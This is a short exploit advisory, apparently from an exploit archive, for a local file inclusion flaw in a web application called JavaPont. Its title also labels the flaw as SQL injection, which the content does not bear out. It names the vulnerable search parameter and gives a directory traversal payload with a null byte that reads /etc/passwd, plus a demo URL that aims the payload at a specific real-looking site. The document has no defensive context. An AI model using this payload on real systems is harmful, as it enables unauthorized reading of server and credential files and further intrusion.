id: 11081
date: 02/25/2010
title: JavaPont local file inclusion vulnerability
author: Palyo34
cves: 

===========================================
JavaPont local file inclusion vulnerability
===========================================

JavaPont SQL Injection LFI Vulnerability 
  
###########################
  
Author    : Palyo34
  
Homepage  : http://www.1923turk.com  
  
  
###########################  
    
[ Vulnerable File ]

index.php?module=search&q=  [ XpL ]
     

[ XpL ]
  
../../../../../../../../../../../../../../../etc/passwd%00


[ Demo]
    
    
http://www.javapont.hu/index.php?module=search&q=../../../../../../../../../../../../../../../etc/passwd%00




#  0day.today [2023-03-25]  #